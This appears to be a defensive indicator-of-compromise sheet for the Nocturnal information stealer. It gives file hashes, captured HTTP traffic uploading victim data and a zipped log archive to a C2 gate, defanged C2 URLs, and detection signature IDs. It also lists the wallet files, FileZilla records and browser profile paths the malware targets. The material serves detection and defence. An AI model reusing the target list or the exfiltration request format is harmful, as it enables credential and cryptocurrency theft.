ㅁ Malware IoC

 

Pattern	Win32/Spyware.Nocturnal
Filename	-
Type	exe
Size	2,159,648 bytes
MD5	ba034519c07bfa65aa810a805508f293

 

 

 

ㅁ Malware Traffic

 

POST /line/?fields=query HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 User-Agent: Nocturnal/1.0 Host: ip-api.com Connection: Keep-Alive Cache-Control: no-cache   --[Removed]--   HTTP/1.1 200 OK Access-Control-Allow-Origin: * Content-Type: text/plain; charset=utf-8 Date: Tue, 05 Jun 2018 02:35:44 GMT Content-Length: 14   [Ip_Removed]

POST /server/gate.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 3299 User-Agent: Nocturnal/1.0 Host: nctrnl.us Connection: Keep-Alive Cache-Control: no-cache   --[Removed] Content-Disposition: form-data; name="hwid"   [Removed] --[Removed] Content-Disposition: form-data; name="os"   [Removed] --[Removed] Content-Disposition: form-data; name="platform"   [Removed] --[Removed] Content-Disposition: form-data; name="profile"   [Removed] --[Removed] Content-Disposition: form-data; name="user"   [Removed] --[Removed] Content-Disposition: form-data; name="pcount"   0 --[Removed] Content-Disposition: form-data; name="cccount"   0 --[Removed] Content-Disposition: form-data; name="ccount"   0 --[Removed] Content-Disposition: form-data; name="logs"; filename="[Removed].zip" Content-Type: zip

 

 

ㅁ Malware String

 

 - ASCII : files/passwords.txt
 - ASCII : Bitcoin/wallet.dat
 - ASCII : Ethereum/keystore
 - ASCII : Electrum/wallets/default_wallet
 - ASCII : Electrum-LTC/wallets/default_wallet
 - ASCII : Exodus/exodus.wallet
 - ASCII : YACoin/wallet.dat
 - ASCII : /files/filezilla_recentservers.xml
 - ASCII : /Google/Chrome/User Data/
 - ASCII : /Chromium/User Data/
 - ASCII : /Kometa/User Data/
 - ASCII : /Amigo/User Data/
 - ASCII : /Torch/User Data/
 - ASCII : /Orbitum/User Data/
 - ASCII : /Opera Software/Opera Stable/User Data/
 - ASCII : /Comodo/Dragon/User Data/
 - ASCII : /Nichrome/User Data/
 - ASCII : /Yandex/YandexBrowser/User Data/
 - ASCII : /Maxthon5/Users/
 - ASCII : /Sputnik/User Data/
 - ASCII : /Epic Privacy Browser/User Data/
 - ASCII : /Vivaldi/User Data/
 - ASCII : /CocCoc/Browser/User Data/
 - ASCII : /Mozilla/Firefox/Profiles/
 - ASCII : /Moonchild Productions/Pale Moon/Profiles/
 - ASCII : /Waterfox/Profiles/
 - ASCII : /8pecxstudios/Cyberfox/Profiles/
 - ASCII : /NETGATE Technologies/BlackHawk/Profiles/
 - ASCII : /Mozilla/icecat/Profiles/
 - ASCII : /K-Meleon/

 

 

 

ㅁ Malware C2

 

 - [Port 80, POST] hxxp://ip-api[.]com/line/?fields=query
 - [Port 80, POST] hxxp://ip-api[.]com/line/?fields=countryCode
 - [Port 80, POST] hxxp://nctrnl[.]us/server/gate.php

 

 

 

ㅁ Malware Hash

 

 - ae7e5a7b34dc216e9da384fcf9868ab2c1a1d731f583f893b2d2d4009da15a4e

 

 

 

ㅁ Wins Sniper Pattern

 

 - [4342] Win32/Spyware.Nocturnal.Connection

 - [4343] Win32/Spyware.Nocturnal.2186392

 - [4344] Win32/Spyware.Nocturnal.1891280

 - [4345] Win32/Spyware.Nocturnal.2159648

 

 

 

ㅁ Wins APTX

 

 

 

 

 

 

Source

https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap